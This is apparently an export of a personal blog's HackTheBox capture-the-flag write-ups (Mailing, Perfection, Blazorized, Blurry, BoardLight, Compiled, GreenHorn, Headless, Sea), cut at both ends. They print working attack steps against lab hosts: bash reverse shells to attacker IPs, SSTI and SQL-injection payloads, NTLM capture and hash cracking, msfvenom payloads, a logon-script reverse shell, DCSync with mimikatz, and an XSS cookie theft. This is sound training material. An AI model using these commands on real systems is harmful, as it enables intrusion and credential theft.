passwords for the admin and the database ![Image](14.png) Using a hash identifier to determine the type of hash before attempting to crack it ![Image](15.png) We can use [crackstation](https://crackstation.net/) for crack it or use `hashcat` as alternative ![Image](16.png) `echo \"841bb5acfa6779ae432fd7a4e6600ba7\" >> hash2.txt` ```bash hashcat -m 0 -a 0 -o cracked.txt hash2.txt /usr/share/wordlists/rockyou.txt ``` - `m 0` sets the mode to MD5. - `a 0` specifies a dictionary attack. ![Image](17.png) 841bb5acfa6779ae432fd7a4e6600ba7:`homenetworkingadministrator` ## **Telnet** I'm using Telnet to verify if I can access the mail using this password. ![Image](18.png) ![Image](19.png) But we cant do anything, there is no exploitable email in the mailbox, but now that I have the credentials of the mail server, I thought that I could obtain NTLM by forcing access to the responder. `NTLM Hash (Windows Challenge/Response) is the cryptographic format in which user passwords are stored on Windows systems.` [**¿How works the NTLM Authentication?**](https://www.ionos.mx/digitalguide/servidores/know-how/ntlm/) After investigating some CVEs, I found one that allows me to send an email to the Maya user found in the log, for to capture an NTLM password. ## CVE-2024-21413 `sudo responder -I tun0` ```bash python3 CVE-2024-21413.py --server mailing.htb --port 587 --username administrator@mailing.htb --password homenetworkingadministrator --sender administrator@mailing.htb --recipient maya@mailing.htb --url '\\\\10.10.16.20\\mailing' --subject HI ``` ![Image](20.png) ![Image](21.png) `Hash from user maya` ```text maya::MAILING:5e0eb9256971de1f:DEBA7F01E81351DCFEDA3C905CA932E8:010100000000000080BA1036359FDA01E3495C93763B0B450000000002000800460042005600410001001E00570049004E002D003300410035005400350049004F00550048003800330004003400570049004E002D003300410035005400350049004F0055004800380033002E0046004200560041002E004C004F00430041004C000300140046004200560041002E004C004F00430041004C000500140046004200560041002E004C004F00430041004C000700080080BA1036359FDA010600040002000000080030003000000000000000000000000020000080F0D79319E6BB3D505B32F68F03892752BD8DD6272B1FBD42563DB8BA2BE13A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310032000000000000000000 ``` ## Hashcat `echo \"841bb5acfa6779ae432fd7a4e6600ba7\" >> hash.txt` ``` hashcat -m 5600 hash.txt -a 0 -o cracked_passwords.txt /usr/share/wordlists/rocky ``` - `m 5600` specifies the NTLMv2 hash mode. - `a 0` specifies a dictionary attack. - ![Image](22.png) ![Image](23.png) ## Evil-Winrm `evil-winrm -i 10.10.11.14 -u maya -p 'm4y4ngs4ri'` ![Image](24.png) User flag ![Image](25.png) ## **Privilege Escalation** After researching how to perform Privilege Escalation on a Windows server, I found some CVEs that seem interesting, such as CVE-2023-2255 for LibreOffice. ![Image](26.png) [_**CVE Libre Office**_](https://github.com/elweth-sec/CVE-2023-2255?tab=readme-ov-file) **CVE-2023-2255** `python3 CVE-2023-2255.py --cmd 'net localgroup Administradores maya /add' --output 'exploit.odt'` To accomplish this, I will embed the user Maya into the exploit.odt file and grant permissions to the local group Administradores. ## **SMB Server** There is an important documents folder under C:. Note that the folder has administrator rights to run. ![Image](27.png) Most likely you put the odt file in there (important documents) and then get the admin shell `impacket-smbserver mailing` pwd `-smb2support` ![Image](28.png) Let the Maya user, running in `evil-winrm`, connect and copy the `exploit.odt` file into the `Important Documents` directory, prompting Maya to click and run the `exploit.odt` file. ``` net use \\\\\\\\10.10.16.20\\\\mailing copy \\\\\\\\10.10.16.20\\\\mailing\\\\exploit.odt ``` ![Image](29.png) After waiting for a few seconds, I'll check the status of the Maya user. `net user maya` ## **Dump SAM Hash** ![Image](30.png) ⭐_HackTool:Win32/Dump is a command line tool that dumps password hashes from Windows NT's SAM(Security Accounts Manager) database. The dumped password hashes can be fed into an NT password auditing tool, such as L0phtCrack to recover the passwords of Windows NT users._ **`crackmapexec smb 10.10.11.14 -u maya -p \"m4y4ngs4ri\" --sam`** - `crackmapexec smb`: Specifies that `crackmapexec` will be used to interact with the SMB protocol. `crackmapexec` is a versatile tool used for pentesting the security of network services, SMB being one of them. - `u maya`: This flag followed by `maya` specifies the username to be used when authenticating to the SMB service on the target machine. - `p \"m4y4ngs4ri\"`: This flag followed by `\"m4y4ngs4ri\"` specifies the password for the username provided. Together with the username, this forms the credentials used for SMB authentication. - `-sam`: This is an option that instructs `crackmapexec` to attempt to dump the SAM (Security Account Manager) database. The SAM database stores user credentials in a Windows system, typically hashed passwords. Dumping the SAM can be used to retrieve these hashes, which can then be cracked offline to obtain plaintext passwords. ![Image](31.png) ## **Remote Windows machine using WMIExec** `impacket-wmiexec localadmin@10.10.11.14 -hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae` - `impacket-wmiexec`: This is a script from the Impacket suite, which is a collection of Python classes for working with network protocols. `impacket-wmiexec` is specifically designed for executing commands remotely on Windows systems using WMI. - `localadmin@10.10.11.14`: - `localadmin` is the username being used to authenticate. - `10.10.11.14` is the IP address of the target machine where commands will be executed. - `hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae`: - `hashes` specifies that hash values are being used instead of a plaintext password for authentication. - `aad3b435b51404eeaad3b435b51404ee` is the LM hash. It is often a placeholder since LM hashing is less secure and frequently disabled in modern systems. - `9aa582783780d1546d62f2d102daefae` is the NT hash, which is the hash of the actual password for the account. [Impacket-wmiexec](https://tools.thehacker.recipes/impacket) ![Image](32.png) `Root`"},{"id":"perfection","title":"HTB - Perfection","description":"HTB - Perfection","date":"2024-02-02T16:17:34.000Z","tags":["HackTheBox","SSTI","sudo","nmap","hashcat"],"authors":["r4cc0x"],"url":"/blog/perfection","content":"## Box Info | Name | Perfection | | :-------------------- | ---------------: | | Release Date | 02 Mar, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## Enumeration ```bash nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.11.253 -oG allPorts nmap -sCV -p 22,80 10.10.11.253 -oN targeted ``` ![Image](0.png) #### Resolution DNS ```bash echo \"10.10.11.253 perfection.htb\" | sudo tee -a /etc/hosts ``` #### Technology ```text whatweb http://perfection.htb ``` ![Image](1.png) ## Web ![Image](2.png) The web is powered by WEBrick version 1.7.0, `WEBrick is a Ruby library providing simple HTTP web servers`{: filepath} ![Image](3.png) Well, if you intercept the request u can see something like this `category1=literature` but if u try to this `category1=$` get a redirect with a text \"Malicious text blocked\". We can do with ffuf an scan for get a list of blocked characters. ```bash ffuf -u http://10.10.11.253/weighted-grade-calc -d 'category1=FUZZ&grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious ``` But what happens if a url encode the input? ```text category1= poop%0aFUZZ &grade1=90&weight1=30&category2=poop&grade2=100&weight2=50&category3=poop&grade3=100&weight3=20&category4=N%2FA&grade4=0&weight4=0&category5=N%2FA&grade5=0&weight5=0' -w /opt/SecLists/Fuzzing/alphanum-case-extra.txt -mr Malicious ``` `%0a`— represents a newline character, used to `bypass input validation`. The first thing I think is that there may be an SSTI. We go look to in payloadallthethings if there is something for ruby [PaylaodsAllTheThings-Ruby](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#ruby---basic-injections) ![Image](pay.png) `hURL` _to encode and decode payloads showcases the manipulation of data to exploit web application vulnerabilities. The payload crafted for the Weighted Grade Calculator application is designed to execute a reverse shell command, taking advantage of any potential server-side code execution vulnerabilities_ ```shell hURL -B \"bash -i >& /dev/tcp/10.10.14.78/7777 0>&1\" (base64) ``` ```shell hURL -U \"{_stringbase64_}\" (URLencoded) ``` ![Image](5.png) #### Payload ```text category1=poop%0a 1 ``` ![Image](6.png) Or use the payload ` ` and urlencoded. ![Image](IO.png) [Hacktricks-SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby) ```bash & /dev/tcp/10.10.14.78/7777 0>&1').readlines() %> ``` ![Image](7.png) Enumerating found the file .db and got the credentials. _A string is any sequence of 4 or more printable characters .db_ ![Image](8.png) ## Privilege Escalation ![Image](9.png) ### Hashcat ```bash hashcat -m 1400 hash.txt -a 3 \"susan_nasus_?d?d?d?d?d?d?d?d\" ``` ![Image](10.png) ![Image](11.png) ```text susan_nasus_413759210 ``` ![Image](12.png) Root"},{"id":"blazorized","title":"HTB - Blazorized","description":"HTB - Blazorized","date":"2024-02-02T00:00:00.000Z","tags":["HackTheBox","NTLM","Evil-winrm","nmap","hashcat","Movement-Lateral","Active-Directory","BloodHound","mimikatz","logoncount","Blazor","metasploit","sqlinjection","powershell","winPEAS"],"authors":["r4cc0x"],"url":"/blog/blazorized","content":"## Box Info | Name | Blazorized | | :-------------------- | ---------------: | | Release Date | 02 Mar, 2024 | | OS | Windows | | Rated Difficulty | Medium | ## **Enumeration** Tip: ![Image](0.png) ## **Nmap** ![Image](1.png) ## Web ![Image](2.png) Puerto{: filepath} `445 Microsoft Directory Services` ```bash smbclient -L //blazorized.htb ``` ![Image](3.png) ## Scan Subdomains ```bash wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt --hc 400,403,404,302 -H \"Host: FUZZ.blazorized.htb\" -u http://blazorized.htb -t 100 ``` ![Image](4.png) With ffuf ```bash ffuf -c -u \"http://blazorized.htb\" -H \"host: FUZZ.blazorized.htb\" -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -fc 301,302 -mc all ``` ![Image](5.png) We found a subdomain called 'admin,' and we added it to our hosts. Web application on port 80 is built with the `Blazor WebAssembly` ![Image](6.png) Blazor webassembly works with Js and json ![Image](7.png) We found a script write in js ![Image](8.png) For read better the code we need to copy and paste to beautifier.io Web. ![Image](9.png) We found a interesting path. ![Image](10.png) The _framework folder contains essential files for the operation of the Blazor application, including `.dll files`, `resources`, and `configuration files`. - `/_framework/blazor.webassembly.js`: Essential for running Blazor apps - `/_framework/wasm/`: Contains WebAssembly binaries Download the DLLs for decompile ![Image](11.png) ## DLL Ananlysis Decompile DLLs using `DNSpy` in windows. ![Image](12.png) `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjoiU3VwZXJfQWRtaW4iLCJpc3MiOiJodHRwOi8vYXBpLmJsYXpvcml6ZWQuaHRiIiwiYXVkIjoiaHR0cDovL2FkbWluLmJsYXpvcml6ZWQuaHRiIiwiZXhwIjoxNzIwMDAwMDAwfQ.tJptKXJlG9KDSjxR9Y3gxdcSy7fHj-50GS6_Dd9PAOk` Build a jwt for Super_Admin ![Image](13.png) **Set the jwt token to Local Storage:** ![Image](14.png) We need use this for secret key for jwt (dont forget) ![Image](15.png) Now we have to copy the string create in jwt.io web and storage local in the web. ![Image](16.png) ![Image](17.png) In the section \"Check Duplicate\" from the web,It make a search in the database, if some category is duplicate, so we a exploit this with SQLinjection ![Image](18.png) The web run a microsoft sql for a get a revshell. [Hacktricks](https://book.hacktricks.xyz/v/es/network-services-pentesting/pentesting-mssql-microsoft-sql-server) ![Image](19.png) Now we are going to use these commands and find out if we are successful. ![Image](20.png) ```shell test'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- - ``` ```shell test'; exec master..xp_cmdshell 'powershell -e *powershellBased64*';-- - ``` ## Nu_1055 We got the shell!!. ![Image](21.png) Change the shell to a meterpreter shell, create a payload, upload and execute. ![Image](22.png) ![Image](23.png) ![Image](24.png) This practice is more convenient for executing certain commands that we cannot perform in the previous shell. ![Image](25.png) It is a tool for visualizing relationships and permissions within an Active Directory (AD) or Azure environment (Azure Active Directory, AAD). [BloodHound](https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1) Upload with metasploit to victim machine and execute the follow command: ```shell powershell -exec bypass -command \"Import-Module ./SharpHound.ps1; Invoke-BloodHound -c all\" ``` ![Image](26.png) Download with the metasploit the .zip in owner attack machine ![Image](27.png) ![Image](28.png) ![Image](29.png) ## Movement Lateral Extract the zip and use it to BloodHound ![Image](30.png) ### WriteSPN - BloodHound reveals that `NU_1055` has `writeSPN Privilege` on the `RSA_4801` account - Vulnerable to SPN-jacking ![Image](31.png) ![Image](32.png) Upload the PowerView.ps1 with metasploit and execute: set SPN ```shell Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='test/test'} ``` Request Service Ticket ```shell Get-DomainSPNTicket -SPN test/test ``` ![Image](33.png) **Tip**: make the hash use all space in your file txt this : ![Image](34.png) to this: ![Image](35.png) #### Hashcat Cracked the hash with **hashcat** ```bash hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt -o found.txt --force ``` ![Image](36.png) password: `(Ni7856Do9854Ki05Ng0005 #)` ![Image](37.png) Use evil-winrm for login as RSA_4810: ```javascript sudo evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)' ``` ### RSA_4810 ![Image](38.png) Use the PowerView.ps1 and upload to RSA_4810 for use Get-NetUser command ![Image](39.png) ### SSA_6010 The another users has a `logoncount` 0 and the user `SSA_6010` has a logoncount 4236. LogonCount is a login count, a property that is part of the profile information in an `Active Directory (AD)` environment. ![Image](40.png) From Bloodhound we can see that RSA_4810 is member of group Remote_Support_Administrators. Upload `winPEAS` and Run and it show us a writeable file path. We have write privilege under A32FF3AEAA23 directory in SYSVOL. icacls A32FF3AEAA23 ![Image](41.png) ```shell 'powershell -e *base64*' | Out-File -FilePath C:\\windows\\SYSVOL\\sysvol\\blazorized.htb\\scripts\\A32FF3AEAA23\\revshell.bat -Encoding ASCII ``` ```shell Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\\revshell.bat' ``` ![Image](42.png) Wait a second and get the shell for SSA_6010 and upload the SharpHound or look again and see the option \"Find Principals with DCSync Rights\" and see the SSA_6010 has a DCSync ![Image](43.png) Upload a mimikatz.exe and execute the following command: lsadump::dcsync /domain:blazorized.htb /user:Administrator ![Image](44.png) And we got the NTHASH for used in evil-winrm ![Image](45.png) Rooted"},{"id":"blurry","title":"HTB - Blurry","description":"HTB - Blurry","date":"2024-02-02T00:00:00.000Z","tags":["CVE-2024-24590","ClearML","pickle-files","pth-files","artifact","API"],"authors":["r4cc0x"],"url":"/blog/blurry","content":"## Box Info | Name | Blurry | | :-------------------- | ---------------: | | Release Date | 30 Mar, 2024 | | OS | Linux | | Rated Difficulty | Medium | ## **Enumeration** ```bash nmap -p- --open --min-rate 5000 -sS -vvv -n -Pn 10.10.11.19 -oG allports nmap -sCV -p 22,80 10.10.11.19 -oN targeted ``` ![Image](0.png) ```bash echo \" 10.10.11.19 app.blurry.htb\" | sudo tee -a /etc/hosts ``` ## ClearML ![Image](1.png) At this point, it is important to know what clear ML is and how it works. After much searching and gathering information, I found that we can connect through a Python package called clearml-agent and create an environment. During the research process, I found that clearml has a **`CVE-2024-24590: Pickle Load on Artifact Get`**. ## CVE-2024-24590 *ClearML involves the inherent insecurity of pickle files. We discovered that an attacker could create a pickle file containing arbitrary code and upload it as an artifact to a project via the API. When a user calls the get method within the Artifact class to download and load a file into memory, the pickle file is deserialized on their system, running any arbitrary code it contains.* ![Image](3.png) ### Create credentials To do this, we need to create new credentials to connect through clearml-agent, and to set up, we use the 'init' option. ![Image](4.png) We press enter on the options and boom, we're connected. ![Image](5.png) So once connected, we'll proceed to exploit the vulnerability. ![Image](6.png) ![Image](7.png) ## Privilege Escalation ### Sudo -l Once **I had the reverse shell**, I continued with my enumeration and found a vulnerability with 'sudo -l ![Image](2.png) I dug into the files and found that when executing /usr/bin/`evaluate_model`, it ran the `demo_model.pth`, which in turn executed the .py file located in `/models/`{: .filepath}. So, I modified the .py file to obtain a reverse shell. ![Image](8.png) But be careful, it runs with 'sudo' as it doesn't require a password to execute it, so we'll obtain a privileged reverse shell. ```bash sudo evaluate_model /models/demo_model.pth ``` ![Image](9.png) With netcat listening the port 9001 ![Image](10.png) **`Root`** ![Image](11.png)"},{"id":"boardlight","title":"HTB - BoardLight","description":"HTB - BoardLight","date":"2024-02-02T00:00:00.000Z","tags":["HackTheBox","Dolibarr","PHP","CVE-2023-30253","LinPEAS","CVE-2022-37706"],"authors":["r4cc0x"],"url":"/blog/boardlight","content":"## Box Info | Name | BoardLight | | :-------------------- | ---------------: | | Release Date | 25 May, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## **Enumeration** ![Image](0.png) ### SubDomain ```bash wfuzz -c -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt \"Host: FUZZ.board.htb\" -u [](http://board.htb/)[http://board.htb](http://board.htb) ``` ![Image](1.png) ![Image](2.png) ![Image](e.png) ![Image](z.png) The login page is using the default credentials by Dolibarr ## Dolibarr 17.0.0 ### CVE-2023-30253 [`Missing Error Handling | OWASP Foundation`](https://owasp.org/www-community/vulnerabilities/Missing_Error_Handling) The version Dolibarr 17.0.0 has a vulnerability to `PHP Code injection` (RCE) (CVE-2023-30253) [Dolibarr confirm RCE in the version 17.0.0](https://github.com/advisories/GHSA-9wqr-5jp4-mjmh) [Security Advisory: Dolibarr 17.0.0 PHP Code Injection (CVE-2023-30253) - Swascan](https://www.swascan.com/security-advisory-dolibarr-17-0-0/) ![Image](b.png) We make a page and use PHP for try to get a reverse shell. ![Image](x.png) ![Image](s.png) ```js ``` ![Image](a.png) ```php & /dev/tcp/10.10.14.88/7777 0>&1'\");?> ``` [https://wiki.dolibarr.org/index.php?title=Backups](https://wiki.dolibarr.org/index.php?title=Backups) ### Credentials ```zsh $dolibarr_main_db_name='dolibarr'; $dolibarr_main_db_prefix='llx_'; $dolibarr_main_db_user='dolibarrowner'; $dolibarr_main_db_pass='serverfun2$2023!!'; $dolibarr_main_db_type='mysqli'; dolibarrowner serverfun2$2023!! cat /etc/passwd | grep bash SSH: larissa serverfun2$2023!! ``` ![Image](3.png) I found no exploitable points and uploaded linpeas to scan for vulnerabilities. ## LinPEAS `_LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix_/MacOS hosts. The checks are explained on [book.hacktricks.xyz](https://book.hacktricks.xyz/linux-hardening/privilege-escalation)_` [PEASS-ng/linPEAS at master · peass-ng/PEASS-ng](https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS) ## Enlightenment_sys Enlightenment_sys in some cases could be an internal component or refer to scripts or tools for interacting with Enlightenment; it could also be a module or a configuration depending on the context. ![Image](4.png) In this point it's just exploit the CVE for scalation previleges and get the root flag. [GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)](https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/tree/main) Run exploit.sh and you obtained the shell as `root`."},{"id":"compiled","title":"HTB - Compiled","description":"HTB - Compiled","date":"2024-02-02T00:00:00.000Z","tags":["HackTheBox","CMS-pluck","RCE","User-Agent"],"authors":["r4cc0x"],"url":"/blog/compiled","content":"## Box Info | Name | Compiled | | :-------------------- | ---------------: | | Release Date | 20 Jul, 2024 | | OS | Windows | | Rated Difficulty | Medium | ## **Enumeration** Information gathering Nmap ![Image](image.png) http://compiled.htb:5000 We have a web what does a git clone of a repository and decompress it and save the link of the repository (git). ![Image](image-1.png) The repository calculator tells us a version of git that runs the web. http://compiled.htb:3000/richard/Calculator ![Image](image-2.png) ## CVE-2024-32002 [Resource For Create The Exploit](https://amalmurali.me/posts/git-rce/) ![Image](image-3.png) In few words we need to create 2 empty repository that match with the names the repository and add the payload useing the [Reverse Shell Generator](https://www.revshells.com/) , the names of repo can you rename as `repo1` and `repo2` or wathever you want, just match with the script. `git clone --recursive git@github.com:amalmurali47/git_rce.git` ```zsh git config --global protocol.file.allow always git config --global core.symlinks true git config --global init.defaultBranch main rm -rf nothing rm -rf toSeeHere git clone http://compiled.htb:3000/test/repo1.git cd repo1 mkdir -p y/hooks cat >y/hooks/post-checkout dotgit.txt git hash-object -w --stdin dot-git.hash printf \"120000 %s 0\\ta\\n\" \"$(cat dot-git.hash)\" >index.info git update-index --index-info - whoami /priv - $Credential.GetNetworkCredential().password - net user Emily - tasklist - Get-Service Upload to winPEAS.exe and execute with powershell PS>./winPEAS.exe ``` ## Privilege Escalation #### WinPEAS.exe ![Image](image-9.png) Searching in google i found this ![Image](image-10.png) ## CVE-2024-20656 *NFS is a protocol that allows us to access files over a network in a manner similar to how we access local storage, and it’s commonly used to share files between UNIX/Linux and Windows systems.* VSStandarCollectorService150 is a diagnostics tools, which is part of the visual studio, creates drectories and files in `\"C:\\Windows\\Temp\"`{: .filepath} directory with insufficiently restrivice permissions. theres a github with a poc for CVE-2024-20656 but we need to make certain modification on the project, and then compile it to an executable. [CVE-2024-20656](https://github.com/Wh04m1001/CVE-2024-20656/tree/main/Expl) ![Image](image-11.png) ### Visual Studio The modification we make it is: ```js WCHAR cmd[] = L\"C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Team Tools\\\\DiagnosticsHub\\\\Collector\\\\VSDiagnostics.exe\"; ``` ![Image](image-12.png) and below in the code called `void cb1()` ```js CopyFile(L\"c:\\\\users\\\\public\\\\payload2.exe\", L\"C:\\\\ProgramData\\\\Microsoft\\\\VisualStudio\\\\SetupWMI\\\\MofCompiler.exe\", FALSE); ``` Create a new payload with msfvenom for get the shell as Administrator. ```zsh msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.16.45 lport=9003 -f exe -o payload2.exe ``` You can put the paylaod/reverseShell there or make a path in `c:\\windows\\Temp`{: .filepath} and make a folder 'test' and inside upload a payload.exe for get shell as `NT/Authority System` Create a new project using the Desktop Development C++ Kit and right click on 'Expl' Solution and then a box will appear with the add option and select the Existing Project. tip: I missed hours why dont works the Expl.exe i found the \"`Debug`\" for compilated need to choose to \"`Release`\" for works the Expl.exe and get the reverse shell. ![Image](image-13.png) Build Solution for compiling/building for get the ouput Expl.exe and upload via Evil-winrm ![Image](image-14.png) For execute the Expl.exe we need to use RunasCs.exe via Evil-winrm but before to execute the expl.exe we go to generate a reverse shell with RunasCs.exe ```bash ./RunasCs.exe Emily 12345678 powershell.exe -r 10.10.16.45:9090 ``` Instant we trying start the service \"msiserivce\". ```text Shell with RunasCs.exe PS> net start msiservice ``` ```text Shell with Evil-winrm PS> ./RunasCs.exe Emily 12345678 \"C:\\Users\\Emily\\Documents\\Expl.exe\" ``` With msfconsole listening get the shell as Administrator ![Image](image-15.png) Rooted We can upload mimikatz.exe for get the hash and login with evil-winrm ```bash PS> mimikatz.exe mimikatz#: lsadumo::sam ``` ![Image](image-16.png) ![Image](image-17.png)"},{"id":"greenhorn","title":"HTB - GreenHorn","description":"HTB - GreenHorn.","date":"2024-02-02T00:00:00.000Z","tags":["HackTheBox","CMS pluck","RCE","User-Agent"],"authors":["r4cc0x"],"url":"/blog/greenhorn","content":"## Box Info | Name | GreenHorn | | :-------------------- | ---------------: | | Release Date | 20 Jul, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## **Enumeration** ### Information Gathering #### Scan with nmap: ![Image](image.png) Add the dns to /etc/hosts: ```java echo \"10.10.11.25 greenhorn.htb\" | sudo tee -a /etc/hosts ``` ```bash whatweb greenhorn.htb or wappalyzer from web. ``` we have in the bottom a web for `admin` with the `CMS` called '`pluck'` ![Image](image-1.png) ## CMS pluck 4.7.18 We found in the web admin the version for the CMS 'pluck' 4.7.18 which have a `RCE vulnerability` but we need a password for login in the pluck CMS so i look at the port 3000 because we have a http with status 200 so investigate i found a web similar to github. After searching, I found credentials I assumed use it to pluck CMS. ![Image](image-2.png) ## Gitea ![Image](image-3.png) `iloveyou1` ![Image](image-4.png) ## Explotation I login into pluck CMS and we are inside as administrator in the web and see the version of the pluck cms ![Image](image-5.png) I found a [RCE](https://www.exploit-db.com/exploits/51592) for that version CMS pluck and we go use it ![Image](image-6.png) looked the \"upload_url\" that tell me the web have a section in \"module\" of pluck CMS called \"installmodule\" so we go to investigate and used it ![Image](image-7.png) To perform the RCE we need to make a reverse shell with pentestmonkey in php because the server is mount over apache so i use the pentestmonkey reverse shell for compressed and upload . ![Image](image-8.png) ## Privilege Escalation when upload the zip we need to reload the web http://greenhorn.htb/data/modules/shell/revshell.php and listening with `nc -lvnp 9001` Once reload the web we got the reverse shell as www-data but we go to re-use the password iloveyou1 for login as junior and see the user.txt file. ![Image](image-9.png) Well for scalation priveligies we download the file 'Using OpenVAS.pdf' ![Image](image-10.png) Well, after hours of searching, i need download 2 tools `pdfimages` from poppler-utils `depix.py` from https://github.com/spipm/Depix `pdfimages ./PDF OUTPUT` ![Image](image-11.png) ## Pixelized Screenshots ```zsh python3 depix.py -p /path/of/openvas image -s /images/searchimages/debruinseq_notepad_windows10_CloseAndSpace.png -o out1.png ``` ![Image](image-12.png) And we got the password for root: sidefromsidetheothersidesidefromsidetheotherside ![Image](image-13.png) and login as root ![Image](image-14.png)"},{"id":"headless","title":"HTB - Headless","description":"HTB - Headless","date":"2024-02-02T00:00:00.000Z","tags":["HackTheBox","Python Werkzeug","XSS","User-Agent"],"authors":["r4cc0x"],"url":"/blog/headless","content":"## Box Info | Name | Headless | | :-------------------- | ---------------: | | Release Date | 23 Mar, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## **Enumeration** ```bash nmap -A -Pn 10.10.11.8 -oG allPorts ``` ![Image](1.png) - http://10.10.11.8:5000/ ![Image](2.png) ## Scan Directory We dont found anything interesting... ![Image](3.png) ### BurpSuite Now go to /support ![Image](5.png) And we try to intercept this with Burpsuite ![Image](4.png) If I try some HTML injection returns the HTTP request content. ![Image](attemp.png) The HTTP `response` headers show it’s a `Werkzeug / Python server` **Exploitation** **Blind XSS on User-Agent** Try to figerout a large time i found the XSS over header put in a `header-false: a alert(1) ` ` : /'+document.cookie);>` ![Image](6.png) **Python Server** `python -m http.server 8020` ![Image](7.png) ![Image](8.png) After Exploit XSS at User-Agent, we get a reply back with the **admin cookie** at the python server ![Image](9.png) - http://10.10.11.8:5000/dashboard ![Image](10.png) ![Image](11.png) **Reverse Shell** ![Image](12.png) ``` #!/bin/bash /bin/bash -c 'exec bash -i >& /dev/tcp/ / 0>&1' #Create Reverse Shell script into a file, In my case I create .sh ``` ![Image](13.png) ![Image](14.png) ![Image](15.png) ![Image](16.png) **User Flag** ## Privilege Escalation #### Check sudo -l ![Image](17.png) Syscheck cat /usr/bin/syscheck: ![Image](18.png) ### Exploit initdb.sh `echo \"chmod u+s /bin/bash\" > initdb.sh chmod +x initdb.sh` - `chmod u+s /bin/bash`: Sets the set-user-ID (SUID) permission on `/bin/bash`, allowing users to execute the bash shell with the file owner's (typically root) privileges. - `chmod +x initdb.sh`: This command changes the permissions of the file `initdb.sh`, making it executable (`+x`) by the file's owner, group, and others. This allows the script to be run as a program by the user. ![Image](19.png) ``` sudo /usr/bin/syscheck /bin/bash -p ``` `/bin/bash -p`: starts a bash shell with root privileges retained, due to the SUID bit making the shell run with the file owner's (root's) effective ID. ![Image](20.png) **Root Flag**"},{"id":"sea","title":"HTB - Sea","description":"HTB - Sea","date":"2024-02-02T00:00:00.000Z","tags":["HackTheBox","FootPrinting","CVE-2023-41425","XXS","Port-Forwarding","Monitoring","Misconfiguration","hashcat"],"authors":["r4cc0x"],"url":"/blog/sea","content":"## Box Info | Name | Sea | | :-------------------- | ---------------: | | Release Date | 10 Aug, 2024 | | OS | Linux | | Rated Difficulty | Easy | ## **Enumeration** ```bash nmap -p- --open --min-rate 5000 -n -sS -vvv -Pn 10.10.11.28 -oG allports nmap -sCV -p 22,80 10.10.11.28 -oN targeted ``` - ttl = 63 aprox 64 = linux ```bash Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-17 16:53 EDT Nmap scan report for 10.10.11.28 (10.10.11.28) Host is up (0.079s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA) | 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA) |_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Sea - Home Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . ``` Googling the version of ssh we can see what we are up against. `Ubuntu focal` ![Image](image.png) Web: The first impression is we have a register page `contact` in `PHP`. ![Image](image-1.png) ![Image](image-2.png) #### Resolution DNS Add sea.htb to hosts. ![Image](image-3.png) The first thing what i was do is if web is created with some CMS or some technology vulnerability, but there nothing, so we go to run a scan directory and see what we have. ![Image](image-4.png) What i know for now is i can upload any link in the section website. ![Image](image-5.png) ## Scan Directory After scan directory with dirsearch, I got some directories but they dont say anything if theres some vulnerability, so we gonna use feroxbuster and some directory lists and see what i get with it ```bash feroxbuster -u http://sea.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ``` ![Image](image-6.png) I see file in `/themes/bike/` (LICENSE with status 200) we will try to FUZZ that section and we see if i found another files. ```bash feroxbuster -u http://sea.htb/themes/bike/ -t 100 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,js,md ``` 